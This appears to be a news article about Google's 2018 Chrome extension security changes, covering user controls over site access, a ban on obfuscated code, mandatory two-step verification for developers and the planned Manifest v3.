For 10 long years, Chrome has produced over 180,000 extensions in the Chrome web store which enabled desktop users to customize Chrome and their web experience. For the uninitiated, Extensions are small software programs that customize the browsing experience which helps users to mold Chrome functionality and behavior suiting individual needs or preferences. Today, Google announced a number of changes regarding handling extensions especially the ones requesting a considerable number of permissions. In addition, it has also declared a set of new requirements for developers who wish to publish their extensions on Chrome web store.
Talking about the need and functions of Chrome extension, Chromium blog claims, “it’s crucial that users be able to trust the extensions they install are safe, privacy-preserving, and performant. Users should always have full transparency about the scope of their extensions’ capabilities and data access”. In recent times, Chrome had taken initiatives to improve extension security with the launch of out-of-process iframes, the removal of inline installation, and advancements in their ability to detect and block malicious extensions. Today they added to their existing rules some new changes along with their plans for the future.
Starting off with Chrome 70, Users are given the power to block extension host access to their custom list of sites and to configure extensions to need a click to be allowed access to the current page. This is how most chrome extensions will lose their ability to see and manipulate any website that the user frequents. This automatically improves user transparency and control over extensions. There’s a transition guide which will guide you when any extension requires your permission.
Adding on to it, Google promises that any extension that requests for “powerful permission” will be put under scrutiny. Also, extensions using a remotely hosted code, which can be altered any time, will also be under close inspection. To reduce review time, Chrome advises developers to include their code entirely in the extension package and also to narrow down the permission range.
Chrome web store will stricty not allow any extension with an obscure code, whether the code is available within the extension package or externally or resource fetched. This applies from today onwards, for any new extension submitted. Existing Chrome extensions can continue, however, they will be required to update within a span of 90 days, failing which they will also be removed from Chrome web store. This follows Chrome’s claim that over 70% of malicious extensions run on obfuscated code. The main use of the obfuscated code is to limit readability and thereby lessening the chances of code theft, but at the same time, such codes really make it difficult to be reviewed.
“Ordinary minification, on the other hand, typically speeds up code execution as it reduces code size, and is much more straightforward to review. Thus, minification will still be allowed, including the following techniques:
- Removal of whitespace, newlines, code comments, and block delimiters
- Shortening of variable and function names
With the start of the new year, Google will enable a two-step-verification process for all developer accounts. Once an extension gets popular, it has the chance of being stolen by hijacking the account. The two-step authentication is believed to add as an extra layer of security, the second layer of which will either be linked to the phone number or any “physical security key”. Google is also considering Advanced Protection Program which offers security to Google’s own employees.
2019 will also see the introduction of the next Chrome extensions of manifest version. Manifest v3 will necessitate extra platform changes aimed at creating stronger security, privacy, and performance guarantees.